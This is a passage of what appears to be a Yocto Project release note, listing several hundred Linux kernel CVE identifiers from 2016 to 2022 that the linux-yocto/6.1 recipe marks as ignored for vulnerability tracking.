:cve:`2016-9919`, :cve:`2017-0605`, :cve:`2017-0627`, :cve:`2017-0750`, :cve:`2017-0786`, :cve:`2017-0861`, :cve:`2017-1000`, :cve:`2017-1000111`, :cve:`2017-1000112`, :cve:`2017-1000251`, :cve:`2017-1000252`, :cve:`2017-1000253`, :cve:`2017-1000255`, :cve:`2017-1000363`, :cve:`2017-1000364`, :cve:`2017-1000365`, :cve:`2017-1000370`, :cve:`2017-1000371`, :cve:`2017-1000379`, :cve:`2017-1000380`, :cve:`2017-1000405`, :cve:`2017-1000407`, :cve:`2017-1000410`, 
:cve:`2017-10661`, :cve:`2017-10662`, :cve:`2017-10663`, :cve:`2017-10810`, :cve:`2017-10911`, :cve:`2017-11089`, :cve:`2017-11176`, :cve:`2017-11472`, :cve:`2017-11473`, :cve:`2017-11600`, :cve:`2017-12134`, :cve:`2017-12146`, :cve:`2017-12153`, :cve:`2017-12154`, :cve:`2017-12168`, :cve:`2017-12188`, :cve:`2017-12190`, :cve:`2017-12192`, :cve:`2017-12193`, :cve:`2017-12762`, :cve:`2017-13080`, :cve:`2017-13166`, :cve:`2017-13167`, :cve:`2017-13168`, :cve:`2017-13215`, :cve:`2017-13216`, :cve:`2017-13220`, :cve:`2017-13305`, :cve:`2017-13686`, :cve:`2017-13695`, :cve:`2017-13715`, :cve:`2017-14051`, :cve:`2017-14106`, :cve:`2017-14140`, :cve:`2017-14156`, :cve:`2017-14340`, :cve:`2017-14489`, :cve:`2017-14497`, :cve:`2017-14954`, :cve:`2017-14991`, :cve:`2017-15102`, :cve:`2017-15115`, :cve:`2017-15116`, :cve:`2017-15121`, :cve:`2017-15126`, :cve:`2017-15127`, :cve:`2017-15128`, :cve:`2017-15129`, :cve:`2017-15265`, :cve:`2017-15274`, :cve:`2017-15299`, :cve:`2017-15306`, :cve:`2017-15537`, :cve:`2017-15649`, :cve:`2017-15868`, :cve:`2017-15951`, :cve:`2017-16525`, :cve:`2017-16526`, :cve:`2017-16527`, :cve:`2017-16528`, :cve:`2017-16529`, :cve:`2017-16530`, :cve:`2017-16531`, :cve:`2017-16532`, :cve:`2017-16533`, :cve:`2017-16534`, :cve:`2017-16535`, :cve:`2017-16536`, :cve:`2017-16537`, :cve:`2017-16538`, :cve:`2017-16643`, :cve:`2017-16644`, :cve:`2017-16645`, :cve:`2017-16646`, :cve:`2017-16647`, :cve:`2017-16648`, :cve:`2017-16649`, :cve:`2017-16650`, :cve:`2017-16911`, :cve:`2017-16912`, :cve:`2017-16913`, :cve:`2017-16914`, :cve:`2017-16939`, :cve:`2017-16994`, :cve:`2017-16995`, :cve:`2017-16996`, :cve:`2017-17052`, :cve:`2017-17053`, :cve:`2017-17448`, :cve:`2017-17449`, :cve:`2017-17450`, :cve:`2017-17558`, :cve:`2017-17712`, :cve:`2017-17741`, :cve:`2017-17805`, :cve:`2017-17806`, :cve:`2017-17807`, :cve:`2017-17852`, :cve:`2017-17853`, :cve:`2017-17854`, :cve:`2017-17855`, :cve:`2017-17856`, :cve:`2017-17857`, :cve:`2017-17862`, :cve:`2017-17863`, 
:cve:`2017-17864`, :cve:`2017-17975`, :cve:`2017-18017`, :cve:`2017-18075`, :cve:`2017-18079`, :cve:`2017-18174`, :cve:`2017-18193`, :cve:`2017-18200`, :cve:`2017-18202`, :cve:`2017-18203`, :cve:`2017-18204`, :cve:`2017-18208`, :cve:`2017-18216`, :cve:`2017-18218`, :cve:`2017-18221`, :cve:`2017-18222`, :cve:`2017-18224`, :cve:`2017-18232`, :cve:`2017-18241`, :cve:`2017-18249`, :cve:`2017-18255`, :cve:`2017-18257`, :cve:`2017-18261`, :cve:`2017-18270`, :cve:`2017-18344`, :cve:`2017-18360`, :cve:`2017-18379`, :cve:`2017-18509`, :cve:`2017-18549`, :cve:`2017-18550`, :cve:`2017-18551`, :cve:`2017-18552`, :cve:`2017-18595`, :cve:`2017-2583`, :cve:`2017-2584`, :cve:`2017-2596`, :cve:`2017-2618`, :cve:`2017-2634`, :cve:`2017-2636`, :cve:`2017-2647`, :cve:`2017-2671`, :cve:`2017-5123`, :cve:`2017-5546`, :cve:`2017-5547`, :cve:`2017-5548`, :cve:`2017-5549`, :cve:`2017-5550`, :cve:`2017-5551`, :cve:`2017-5576`, :cve:`2017-5577`, :cve:`2017-5669`, :cve:`2017-5715`, :cve:`2017-5753`, :cve:`2017-5754`, :cve:`2017-5897`, :cve:`2017-5967`, :cve:`2017-5970`, :cve:`2017-5972`, :cve:`2017-5986`, :cve:`2017-6001`, :cve:`2017-6074`, :cve:`2017-6214`, :cve:`2017-6345`, :cve:`2017-6346`, :cve:`2017-6347`, :cve:`2017-6348`, :cve:`2017-6353`, :cve:`2017-6874`, :cve:`2017-6951`, :cve:`2017-7184`, :cve:`2017-7187`, :cve:`2017-7261`, :cve:`2017-7273`, :cve:`2017-7277`, :cve:`2017-7294`, :cve:`2017-7308`, :cve:`2017-7346`, :cve:`2017-7374`, :cve:`2017-7472`, :cve:`2017-7477`, :cve:`2017-7482`, :cve:`2017-7487`, :cve:`2017-7495`, :cve:`2017-7518`, :cve:`2017-7533`, :cve:`2017-7541`, :cve:`2017-7542`, :cve:`2017-7558`, :cve:`2017-7616`, :cve:`2017-7618`, :cve:`2017-7645`, :cve:`2017-7889`, :cve:`2017-7895`, :cve:`2017-7979`, :cve:`2017-8061`, :cve:`2017-8062`, :cve:`2017-8063`, :cve:`2017-8064`, :cve:`2017-8065`, :cve:`2017-8066`, :cve:`2017-8067`, :cve:`2017-8068`, :cve:`2017-8069`, :cve:`2017-8070`, :cve:`2017-8071`, :cve:`2017-8072`, :cve:`2017-8106`, :cve:`2017-8240`, :cve:`2017-8797`, 
:cve:`2017-8824`, :cve:`2017-8831`, :cve:`2017-8890`, :cve:`2017-8924`, :cve:`2017-8925`, :cve:`2017-9059`, :cve:`2017-9074`, :cve:`2017-9075`, :cve:`2017-9076`, :cve:`2017-9077`, :cve:`2017-9150`, :cve:`2017-9211`, :cve:`2017-9242`, :cve:`2017-9605`, :cve:`2017-9725`, :cve:`2017-9984`, :cve:`2017-9985`, :cve:`2017-9986`, :cve:`2018-1000004`, :cve:`2018-1000026`, :cve:`2018-1000028`, :cve:`2018-1000199`, :cve:`2018-1000200`, :cve:`2018-1000204`, :cve:`2018-10021`, :cve:`2018-10074`, :cve:`2018-10087`, :cve:`2018-10124`, :cve:`2018-10322`, :cve:`2018-10323`, :cve:`2018-1065`, :cve:`2018-1066`, :cve:`2018-10675`, :cve:`2018-1068`, :cve:`2018-10840`, :cve:`2018-10853`, :cve:`2018-1087`, :cve:`2018-10876`, :cve:`2018-10877`, :cve:`2018-10878`, :cve:`2018-10879`, :cve:`2018-10880`, :cve:`2018-10881`, :cve:`2018-10882`, :cve:`2018-10883`, :cve:`2018-10901`, :cve:`2018-10902`, :cve:`2018-1091`, :cve:`2018-1092`, :cve:`2018-1093`, :cve:`2018-10938`, :cve:`2018-1094`, :cve:`2018-10940`, :cve:`2018-1095`, :cve:`2018-1108`, :cve:`2018-1118`, :cve:`2018-1120`, :cve:`2018-11232`, :cve:`2018-1128`, :cve:`2018-1129`, :cve:`2018-1130`, :cve:`2018-11412`, :cve:`2018-11506`, :cve:`2018-11508`, :cve:`2018-12126`, :cve:`2018-12127`, :cve:`2018-12130`, :cve:`2018-12207`, :cve:`2018-12232`, :cve:`2018-12233`, :cve:`2018-12633`, :cve:`2018-12714`, :cve:`2018-12896`, :cve:`2018-12904`, :cve:`2018-13053`, :cve:`2018-13093`, :cve:`2018-13094`, :cve:`2018-13095`, :cve:`2018-13096`, :cve:`2018-13097`, :cve:`2018-13098`, :cve:`2018-13099`, :cve:`2018-13100`, :cve:`2018-13405`, :cve:`2018-13406`, :cve:`2018-14609`, :cve:`2018-14610`, :cve:`2018-14611`, :cve:`2018-14612`, :cve:`2018-14613`, :cve:`2018-14614`, :cve:`2018-14615`, :cve:`2018-14616`, :cve:`2018-14617`, :cve:`2018-14619`, :cve:`2018-14625`, :cve:`2018-14633`, :cve:`2018-14634`, :cve:`2018-14641`, :cve:`2018-14646`, :cve:`2018-14656`, :cve:`2018-14678`, :cve:`2018-14734`, :cve:`2018-15471`, :cve:`2018-15572`, :cve:`2018-15594`, 
:cve:`2018-16276`, :cve:`2018-16597`, :cve:`2018-16658`, :cve:`2018-16862`, :cve:`2018-16871`, :cve:`2018-16880`, :cve:`2018-16882`, :cve:`2018-16884`, :cve:`2018-17182`, :cve:`2018-17972`, :cve:`2018-18021`, :cve:`2018-18281`, :cve:`2018-18386`, :cve:`2018-18397`, :cve:`2018-18445`, :cve:`2018-18559`, :cve:`2018-18690`, :cve:`2018-18710`, :cve:`2018-18955`, :cve:`2018-19406`, :cve:`2018-19407`, :cve:`2018-19824`, :cve:`2018-19854`, :cve:`2018-19985`, :cve:`2018-20169`, :cve:`2018-20449`, :cve:`2018-20509`, :cve:`2018-20510`, :cve:`2018-20511`, :cve:`2018-20669`, :cve:`2018-20784`, :cve:`2018-20836`, :cve:`2018-20854`, :cve:`2018-20855`, :cve:`2018-20856`, :cve:`2018-20961`, :cve:`2018-20976`, :cve:`2018-21008`, :cve:`2018-25015`, :cve:`2018-25020`, :cve:`2018-3620`, :cve:`2018-3639`, :cve:`2018-3646`, :cve:`2018-3665`, :cve:`2018-3693`, :cve:`2018-5332`, :cve:`2018-5333`, :cve:`2018-5344`, :cve:`2018-5390`, :cve:`2018-5391`, :cve:`2018-5703`, :cve:`2018-5750`, :cve:`2018-5803`, :cve:`2018-5814`, :cve:`2018-5848`, :cve:`2018-5873`, :cve:`2018-5953`, :cve:`2018-5995`, :cve:`2018-6412`, :cve:`2018-6554`, :cve:`2018-6555`, :cve:`2018-6927`, :cve:`2018-7191`, :cve:`2018-7273`, :cve:`2018-7480`, :cve:`2018-7492`, :cve:`2018-7566`, :cve:`2018-7740`, :cve:`2018-7754`, :cve:`2018-7755`, :cve:`2018-7757`, :cve:`2018-7995`, :cve:`2018-8043`, :cve_mitre:`2018-8087`, :cve_mitre:`2018-8781`, :cve_mitre:`2018-8822`, :cve_mitre:`2018-8897`, :cve_mitre:`2018-9363`, :cve_mitre:`2018-9385`, :cve_mitre:`2018-9415`, :cve_mitre:`2018-9422`, :cve_mitre:`2018-9465`, :cve_mitre:`2018-9516`, :cve_mitre:`2018-9517`, :cve_mitre:`2018-9518` and :cve_mitre:`2018-9568`
+- linux-yocto/6.1 (Continued): Ignore :cve:`2019-0136`, :cve:`2019-0145`, :cve:`2019-0146`, :cve:`2019-0147`, :cve:`2019-0148`, :cve:`2019-0149`, :cve:`2019-0154`, :cve:`2019-0155`, :cve:`2019-10124`, :cve:`2019-10125`, :cve:`2019-10126`, :cve:`2019-10142`, :cve:`2019-10207`, :cve:`2019-10220`, :cve:`2019-10638`, :cve:`2019-10639`, :cve:`2019-11085`, :cve:`2019-11091`, :cve:`2019-11135`, :cve:`2019-11190`, :cve:`2019-11191`, :cve:`2019-1125`, :cve:`2019-11477`, :cve:`2019-11478`, :cve:`2019-11479`, :cve:`2019-11486`, :cve:`2019-11487`, :cve:`2019-11599`, :cve:`2019-11683`, :cve:`2019-11810`, :cve:`2019-11811`, :cve:`2019-11815`, :cve:`2019-11833`, :cve:`2019-11884`, :cve:`2019-12378`, :cve:`2019-12379`, :cve:`2019-12380`, :cve:`2019-12381`, :cve:`2019-12382`, :cve:`2019-12454`, :cve:`2019-12455`, :cve:`2019-12614`, :cve:`2019-12615`, :cve:`2019-12817`, :cve:`2019-12818`, :cve:`2019-12819`, :cve:`2019-12881`, :cve:`2019-12984`, :cve:`2019-13233`, :cve:`2019-13272`, :cve:`2019-13631`, :cve:`2019-13648`, :cve:`2019-14283`, :cve:`2019-14284`, :cve:`2019-14615`, :cve:`2019-14763`, :cve:`2019-14814`, :cve:`2019-14815`, :cve:`2019-14816`, :cve:`2019-14821`, :cve:`2019-14835`, :cve:`2019-14895`, :cve:`2019-14896`, :cve:`2019-14897`, :cve:`2019-14901`, :cve:`2019-15030`, :cve:`2019-15031`, :cve:`2019-15090`, :cve:`2019-15098`, :cve:`2019-15099`, :cve:`2019-15117`, :cve:`2019-15118`, :cve:`2019-15211`, :cve:`2019-15212`, :cve:`2019-15213`, :cve:`2019-15214`, :cve:`2019-15215`, :cve:`2019-15216`, :cve:`2019-15217`, :cve:`2019-15218`, :cve:`2019-15219`, :cve:`2019-15220`, :cve:`2019-15221`, :cve:`2019-15222`, :cve:`2019-15223`, :cve:`2019-15291`, :cve:`2019-15292`, :cve:`2019-15504`, :cve:`2019-15505`, :cve:`2019-15538`, :cve:`2019-15666`, :cve:`2019-15794`, :cve:`2019-15807`, :cve:`2019-15916`, :cve:`2019-15917`, :cve:`2019-15918`, :cve:`2019-15919`, :cve:`2019-15920`, :cve:`2019-15921`, :cve:`2019-15922`, :cve:`2019-15923`, :cve:`2019-15924`, :cve:`2019-15925`, 
:cve:`2019-15926`, :cve:`2019-15927`, :cve:`2019-16229`, :cve:`2019-16230`, :cve:`2019-16231`, :cve:`2019-16232`, :cve:`2019-16233`, :cve:`2019-16234`, :cve:`2019-16413`, :cve:`2019-16714`, :cve:`2019-16746`, :cve:`2019-16921`, :cve:`2019-16994`, :cve:`2019-16995`, :cve:`2019-17052`, :cve:`2019-17053`, :cve:`2019-17054`, :cve:`2019-17055`, :cve:`2019-17056`, :cve:`2019-17075`, :cve:`2019-17133`, :cve:`2019-17351`, :cve:`2019-17666`, :cve:`2019-18198`, :cve:`2019-18282`, :cve:`2019-18660`, :cve:`2019-18675`, :cve:`2019-18683`, :cve:`2019-18786`, :cve:`2019-18805`, :cve:`2019-18806`, :cve:`2019-18807`, :cve:`2019-18808`, :cve:`2019-18809`, :cve:`2019-18810`, :cve:`2019-18811`, :cve:`2019-18812`, :cve:`2019-18813`, :cve:`2019-18814`, :cve:`2019-18885`, :cve:`2019-19036`, :cve:`2019-19037`, :cve:`2019-19039`, :cve:`2019-19043`, :cve:`2019-19044`, :cve:`2019-19045`, :cve:`2019-19046`, :cve:`2019-19047`, :cve:`2019-19048`, :cve:`2019-19049`, :cve:`2019-19050`, :cve:`2019-19051`, :cve:`2019-19052`, :cve:`2019-19053`, :cve:`2019-19054`, :cve:`2019-19055`, :cve:`2019-19056`, :cve:`2019-19057`, :cve:`2019-19058`, :cve:`2019-19059`, :cve:`2019-19060`, :cve:`2019-19061`, :cve:`2019-19062`, :cve:`2019-19063`, :cve:`2019-19064`, :cve:`2019-19065`, :cve:`2019-19066`, :cve:`2019-19067`, :cve:`2019-19068`, :cve:`2019-19069`, :cve:`2019-19070`, :cve:`2019-19071`, :cve:`2019-19072`, :cve:`2019-19073`, :cve:`2019-19074`, :cve:`2019-19075`, :cve:`2019-19076`, :cve:`2019-19077`, :cve:`2019-19078`, :cve:`2019-19079`, :cve:`2019-19080`, :cve:`2019-19081`, :cve:`2019-19082`, :cve:`2019-19083`, :cve:`2019-19227`, :cve:`2019-19241`, :cve:`2019-19252`, :cve:`2019-19318`, :cve:`2019-19319`, :cve:`2019-19332`, :cve:`2019-19338`, :cve:`2019-19377`, :cve:`2019-19447`, :cve:`2019-19448`, :cve:`2019-19449`, :cve:`2019-19462`, :cve:`2019-19523`, :cve:`2019-19524`, :cve:`2019-19525`, :cve:`2019-19526`, :cve:`2019-19527`, :cve:`2019-19528`, :cve:`2019-19529`, :cve:`2019-19530`, :cve:`2019-19531`, 
:cve:`2019-19532`, :cve:`2019-19533`, :cve:`2019-19534`, :cve:`2019-19535`, :cve:`2019-19536`, :cve:`2019-19537`, :cve:`2019-19543`, :cve:`2019-19602`, :cve:`2019-19767`, :cve:`2019-19768`, :cve:`2019-19769`, :cve:`2019-19770`, :cve:`2019-19807`, :cve:`2019-19813`, :cve:`2019-19815`, :cve:`2019-19816`, :cve:`2019-19922`, :cve:`2019-19927`, :cve:`2019-19947`, :cve:`2019-19965`, :cve:`2019-19966`, :cve:`2019-1999`, :cve:`2019-20054`, :cve:`2019-20095`, :cve:`2019-20096`, :cve:`2019-2024`, :cve:`2019-2025`, :cve:`2019-20422`, :cve:`2019-2054`, :cve:`2019-20636`, :cve:`2019-20806`, :cve:`2019-20810`, :cve:`2019-20811`, :cve:`2019-20812`, :cve:`2019-20908`, :cve:`2019-20934`, :cve:`2019-2101`, :cve:`2019-2181`, :cve:`2019-2182`, :cve:`2019-2213`, :cve:`2019-2214`, :cve:`2019-2215`, :cve:`2019-25044`, :cve:`2019-25045`, :cve:`2019-3016`, :cve:`2019-3459`, :cve:`2019-3460`, :cve:`2019-3701`, :cve:`2019-3819`, :cve:`2019-3837`, :cve:`2019-3846`, :cve:`2019-3874`, :cve:`2019-3882`, :cve:`2019-3887`, :cve:`2019-3892`, :cve:`2019-3896`, :cve:`2019-3900`, :cve:`2019-3901`, :cve:`2019-5108`, :cve:`2019-6133`, :cve:`2019-6974`, :cve:`2019-7221`, :cve:`2019-7222`, :cve:`2019-7308`, :cve:`2019-8912`, :cve:`2019-8956`, :cve:`2019-8980`, :cve:`2019-9003`, :cve:`2019-9162`, :cve:`2019-9213`, :cve:`2019-9245`, :cve:`2019-9444`, :cve:`2019-9445`, :cve:`2019-9453`, :cve:`2019-9454`, :cve:`2019-9455`, :cve:`2019-9456`, :cve:`2019-9457`, :cve:`2019-9458`, :cve:`2019-9466`, :cve:`2019-9500`, :cve:`2019-9503`, :cve:`2019-9506`, :cve:`2019-9857`, :cve:`2020-0009`, :cve:`2020-0030`, :cve:`2020-0041`, :cve:`2020-0066`, :cve:`2020-0067`, :cve:`2020-0110`, :cve:`2020-0255`, :cve:`2020-0305`, :cve:`2020-0404`, :cve:`2020-0423`, :cve:`2020-0427`, :cve:`2020-0429`, :cve:`2020-0430`, :cve:`2020-0431`, :cve:`2020-0432`, :cve:`2020-0433`, :cve:`2020-0435`, :cve:`2020-0444`, :cve:`2020-0465`, :cve:`2020-0466`, :cve:`2020-0543`, :cve:`2020-10135`, :cve:`2020-10690`, :cve:`2020-10711`, :cve:`2020-10720`, 
:cve:`2020-10732`, :cve:`2020-10742`, :cve:`2020-10751`, :cve:`2020-10757`, :cve:`2020-10766`, :cve:`2020-10767`, :cve:`2020-10768`, :cve:`2020-10769`, :cve:`2020-10773`, :cve:`2020-10781`, :cve:`2020-10942`, :cve:`2020-11494`, :cve:`2020-11565`, :cve:`2020-11608`, :cve:`2020-11609`, :cve:`2020-11668`, :cve:`2020-11669`, :cve:`2020-11884`, :cve:`2020-12114`, :cve:`2020-12351`, :cve:`2020-12352`, :cve:`2020-12362`, :cve:`2020-12363`, :cve:`2020-12364`, :cve:`2020-12464`, :cve:`2020-12465`, :cve:`2020-12652`, :cve:`2020-12653`, :cve:`2020-12654`, :cve:`2020-12655`, :cve:`2020-12656`, :cve:`2020-12657`, :cve:`2020-12659`, :cve:`2020-12768`, :cve:`2020-12769`, :cve:`2020-12770`, :cve:`2020-12771`, :cve:`2020-12826`, :cve:`2020-12888`, :cve:`2020-12912`, :cve:`2020-13143`, :cve:`2020-13974`, :cve:`2020-14305`, :cve:`2020-14314`, :cve:`2020-14331`, :cve:`2020-14351`, :cve:`2020-14353`, :cve:`2020-14356`, :cve:`2020-14381`, :cve:`2020-14385`, :cve:`2020-14386`, :cve:`2020-14390`, :cve:`2020-14416`, :cve:`2020-15393`, :cve:`2020-15436`, :cve:`2020-15437`, :cve:`2020-15780`, :cve:`2020-15852`, :cve:`2020-16119`, :cve:`2020-16120`, :cve:`2020-16166`, :cve:`2020-1749`, :cve:`2020-24394`, :cve:`2020-24490`, :cve:`2020-24504`, :cve:`2020-24586`, :cve:`2020-24587`, :cve:`2020-24588`, :cve:`2020-25211`, :cve:`2020-25212`, :cve:`2020-25221`, :cve:`2020-25284`, :cve:`2020-25285`, :cve:`2020-25639`, :cve:`2020-25641`, :cve:`2020-25643`, :cve:`2020-25645`, :cve:`2020-25656`, :cve:`2020-25668`, :cve:`2020-25669`, :cve:`2020-25670`, :cve:`2020-25671`, :cve:`2020-25672`, :cve:`2020-25673`, :cve:`2020-25704`, :cve:`2020-25705`, :cve:`2020-26088`, :cve:`2020-26139`, :cve:`2020-26141`, :cve:`2020-26145`, :cve:`2020-26147`, :cve:`2020-26541`, :cve:`2020-26555`, :cve:`2020-26558`, :cve:`2020-27066`, :cve:`2020-27067`, :cve:`2020-27068`, :cve:`2020-27152`, :cve:`2020-27170`, :cve:`2020-27171`, :cve:`2020-27194`, :cve:`2020-2732`, :cve:`2020-27673`, :cve:`2020-27675`, :cve:`2020-27777`, 
:cve:`2020-27784`, :cve:`2020-27786`, :cve:`2020-27815`, :cve:`2020-27820`, :cve:`2020-27825`, :cve:`2020-27830`, :cve:`2020-27835`, :cve:`2020-28097`, :cve:`2020-28374`, :cve:`2020-28588`, :cve:`2020-28915`, :cve:`2020-28941`, :cve:`2020-28974`, :cve:`2020-29368`, :cve:`2020-29369`, :cve:`2020-29370`, :cve:`2020-29371`, :cve:`2020-29372`, :cve:`2020-29373`, :cve:`2020-29374`, :cve:`2020-29534`, :cve:`2020-29568`, :cve:`2020-29569`, :cve:`2020-29660`, :cve:`2020-29661`, :cve:`2020-35499`, :cve:`2020-35508`, :cve:`2020-35513`, :cve:`2020-35519`, :cve:`2020-36158`, :cve:`2020-36310`, :cve:`2020-36311`, :cve:`2020-36312`, :cve:`2020-36313`, :cve:`2020-36322`, :cve:`2020-36385`, :cve:`2020-36386`, :cve:`2020-36387`, :cve:`2020-36516`, :cve:`2020-36557`, :cve:`2020-36558`, :cve:`2020-36691`, :cve:`2020-36694`, :cve:`2020-36766`, :cve:`2020-3702`, :cve:`2020-4788`, :cve:`2020-7053`, :cve:`2020-8428`, :cve:`2020-8647`, :cve:`2020-8648`, :cve:`2020-8649`, :cve:`2020-8694`, :cve:`2020-8834`, :cve:`2020-8835`, :cve:`2020-8992`, :cve:`2020-9383`, :cve:`2020-9391`, :cve:`2021-0129`, :cve:`2021-0342`, :cve_mitre:`2021-0447`, :cve_mitre:`2021-0448`, :cve:`2021-0512`, :cve:`2021-0605`, :cve:`2021-0707`, :cve:`2021-0920`, :cve:`2021-0929`, :cve:`2021-0935`, :cve_mitre:`2021-0937`, :cve:`2021-0938`, :cve:`2021-0941`, :cve:`2021-1048`, :cve:`2021-20177`, :cve:`2021-20194`, :cve:`2021-20226`, :cve:`2021-20239`, :cve:`2021-20261`, :cve:`2021-20265`, :cve:`2021-20268`, :cve:`2021-20292`, :cve:`2021-20317`, :cve:`2021-20320`, :cve:`2021-20321`, :cve:`2021-20322`, :cve:`2021-21781`, :cve:`2021-22543`, :cve:`2021-22555`, :cve:`2021-22600`, :cve:`2021-23133`, :cve:`2021-23134`, :cve:`2021-26401`, :cve:`2021-26708`, :cve:`2021-26930`, :cve:`2021-26931`, :cve:`2021-26932`, :cve:`2021-27363`, :cve:`2021-27364`, :cve:`2021-27365`, :cve:`2021-28038`, :cve:`2021-28039`, :cve:`2021-28375`, :cve:`2021-28660`, :cve:`2021-28688`, :cve:`2021-28691`, :cve:`2021-28711`, :cve:`2021-28712`, 
:cve:`2021-28713`, :cve:`2021-28714`, :cve:`2021-28715`, :cve:`2021-28950`, :cve:`2021-28951`, :cve:`2021-28952`, :cve:`2021-28964`, :cve:`2021-28971`, :cve:`2021-28972`, :cve:`2021-29154`, :cve:`2021-29155`, :cve:`2021-29264`, :cve:`2021-29265`, :cve:`2021-29266`, :cve:`2021-29646`, :cve:`2021-29647`, :cve:`2021-29648`, :cve:`2021-29649`, :cve:`2021-29650`, :cve:`2021-29657`, :cve:`2021-30002`, :cve:`2021-30178`, :cve:`2021-31440`, :cve:`2021-3178`, :cve:`2021-31829`, :cve:`2021-31916`, :cve:`2021-32078`, :cve:`2021-32399`, :cve:`2021-32606`, :cve:`2021-33033`, :cve:`2021-33034`, :cve:`2021-33061`, :cve:`2021-33098`, :cve:`2021-33135`, :cve:`2021-33200`, :cve:`2021-3347`, :cve:`2021-3348`, :cve:`2021-33624`, :cve:`2021-33655`, :cve:`2021-33656`, :cve:`2021-33909`, :cve:`2021-3411`, :cve:`2021-3428`, :cve:`2021-3444`, :cve:`2021-34556`, :cve:`2021-34693`, :cve:`2021-3483`, :cve:`2021-34866`, :cve:`2021-3489`, :cve:`2021-3490`, :cve:`2021-3491`, :cve:`2021-3493`, :cve_mitre:`2021-34981`, :cve:`2021-3501`, :cve:`2021-35039`, :cve:`2021-3506`, :cve:`2021-3543`, :cve:`2021-35477`, :cve:`2021-3564`, :cve:`2021-3573`, :cve:`2021-3587`, :cve_mitre:`2021-3600`, :cve:`2021-3609`, :cve:`2021-3612`, :cve:`2021-3635`, :cve:`2021-3640`, :cve:`2021-3653`, :cve:`2021-3655`, :cve:`2021-3656`, :cve:`2021-3659`, :cve:`2021-3669`, :cve:`2021-3679`, :cve:`2021-3715`, :cve:`2021-37159`, :cve:`2021-3732`, :cve:`2021-3736`, :cve:`2021-3739`, :cve:`2021-3743`, :cve:`2021-3744`, :cve:`2021-3752`, :cve:`2021-3753`, :cve:`2021-37576`, :cve:`2021-3759`, :cve:`2021-3760`, :cve:`2021-3764`, :cve:`2021-3772`, :cve:`2021-38160`, :cve:`2021-38166`, :cve:`2021-38198`, :cve:`2021-38199`, :cve:`2021-38200`, :cve:`2021-38201`, :cve:`2021-38202`, :cve:`2021-38203`, :cve:`2021-38204`, :cve:`2021-38205`, :cve:`2021-38206`, :cve:`2021-38207`, :cve:`2021-38208`, :cve:`2021-38209`, :cve:`2021-38300`, :cve:`2021-3894`, :cve:`2021-3896`, :cve:`2021-3923`, :cve:`2021-39633`, :cve:`2021-39634`, 
:cve:`2021-39636`, :cve:`2021-39648`, :cve:`2021-39656`, :cve:`2021-39657`, :cve:`2021-39685`, :cve:`2021-39686`, :cve:`2021-39698`, :cve:`2021-39711`, :cve:`2021-39713`, :cve:`2021-39714`, :cve:`2021-4001`, :cve:`2021-4002`, :cve:`2021-4023`, :cve:`2021-4028`, :cve:`2021-4032`, :cve:`2021-4037`, :cve:`2021-40490`, :cve:`2021-4083`, :cve:`2021-4090`, :cve:`2021-4093`, :cve:`2021-4095`, :cve:`2021-41073`, :cve:`2021-4135`, :cve:`2021-4148`, :cve:`2021-4149`, :cve:`2021-4150`, :cve:`2021-4154`, :cve:`2021-4155`, :cve:`2021-4157`, :cve:`2021-4159`, :cve:`2021-41864`, :cve:`2021-4197`, :cve:`2021-42008`, :cve:`2021-4202`, :cve:`2021-4203`, :cve:`2021-4204`, :cve:`2021-4218`, :cve:`2021-42252`, :cve:`2021-42327`, :cve:`2021-42739`, :cve:`2021-43056`, :cve:`2021-43057`, :cve:`2021-43267`, :cve:`2021-43389`, :cve:`2021-43975`, :cve:`2021-43976`, :cve:`2021-44733`, :cve:`2021-44879`, :cve:`2021-45095`, :cve:`2021-45100`, :cve:`2021-45402`, :cve:`2021-45469`, :cve:`2021-45480`, :cve:`2021-45485`, :cve:`2021-45486`, :cve:`2021-45868`, :cve:`2021-46283`, :cve:`2022-0001`, :cve:`2022-0002`, :cve:`2022-0168`, :cve:`2022-0171`, :cve:`2022-0185`, :cve:`2022-0264`, :cve:`2022-0286`, :cve:`2022-0322`, :cve:`2022-0330`, :cve:`2022-0382`, :cve:`2022-0433`, :cve:`2022-0435`, :cve:`2022-0480`, :cve:`2022-0487`, :cve:`2022-0492`, :cve:`2022-0494`, :cve:`2022-0500`, :cve:`2022-0516`, :cve:`2022-0617`, :cve:`2022-0644`, :cve:`2022-0646`, :cve:`2022-0742`, :cve:`2022-0812`, :cve:`2022-0847`, :cve:`2022-0850`, :cve:`2022-0854`, :cve:`2022-0995`, :cve:`2022-0998`, :cve:`2022-1011`, :cve:`2022-1012`, :cve:`2022-1015`, :cve:`2022-1016`, :cve:`2022-1043`, :cve:`2022-1048`, :cve:`2022-1055`, :cve:`2022-1158`, :cve:`2022-1184`, :cve:`2022-1195`, :cve:`2022-1198`, :cve:`2022-1199`, :cve:`2022-1204`, :cve:`2022-1205`, :cve:`2022-1263`, :cve:`2022-1280`, :cve:`2022-1353`, :cve:`2022-1419`, :cve:`2022-1462`, :cve:`2022-1508`, :cve:`2022-1516`, :cve:`2022-1651`, :cve:`2022-1652`, :cve:`2022-1671`, 
:cve:`2022-1678`, :cve:`2022-1679`, :cve:`2022-1729`, :cve:`2022-1734`, :cve:`2022-1786`, :cve:`2022-1789`, :cve:`2022-1836`, :cve:`2022-1852`, :cve:`2022-1882`, :cve:`2022-1943`, :cve:`2022-1966`, :cve:`2022-1972`, :cve:`2022-1973`, :cve:`2022-1974`, :cve:`2022-1975`, :cve:`2022-1976`, :cve:`2022-1998`, :cve:`2022-20008`, :cve:`2022-20132`, :cve:`2022-20141`, :cve:`2022-20148`, :cve:`2022-20153`, :cve:`2022-20154`, :cve:`2022-20158`, :cve:`2022-20166`, :cve:`2022-20368`, :cve:`2022-20369`, :cve:`2022-20409`, :cve:`2022-20421`, :cve:`2022-20422`, :cve:`2022-20423`, :cve:`2022-20424`, :cve_mitre:`2022-20565`, :cve:`2022-20566`, :cve:`2022-20567`, :cve:`2022-20568`, :cve:`2022-20572`, :cve:`2022-2078`, :cve:`2022-21123`, :cve:`2022-21125`, :cve:`2022-21166`, :cve:`2022-21385`, :cve:`2022-21499`, :cve_mitre:`2022-21505`, :cve:`2022-2153`, :cve:`2022-2196`, :cve_mitre:`2022-22942`, :cve:`2022-23036`, :cve:`2022-23037`, :cve:`2022-23038`, :cve:`2022-23039`, :cve:`2022-23040`, :cve:`2022-23041`, :cve:`2022-23042`, :cve:`2022-2308`, :cve:`2022-2318`, :cve:`2022-23222`, :cve:`2022-2327`, :cve:`2022-2380`, :cve:`2022-23816`, :cve:`2022-23960`, :cve:`2022-24122`, :cve:`2022-24448`, :cve:`2022-24958`, :cve:`2022-24959`, :cve:`2022-2503`, 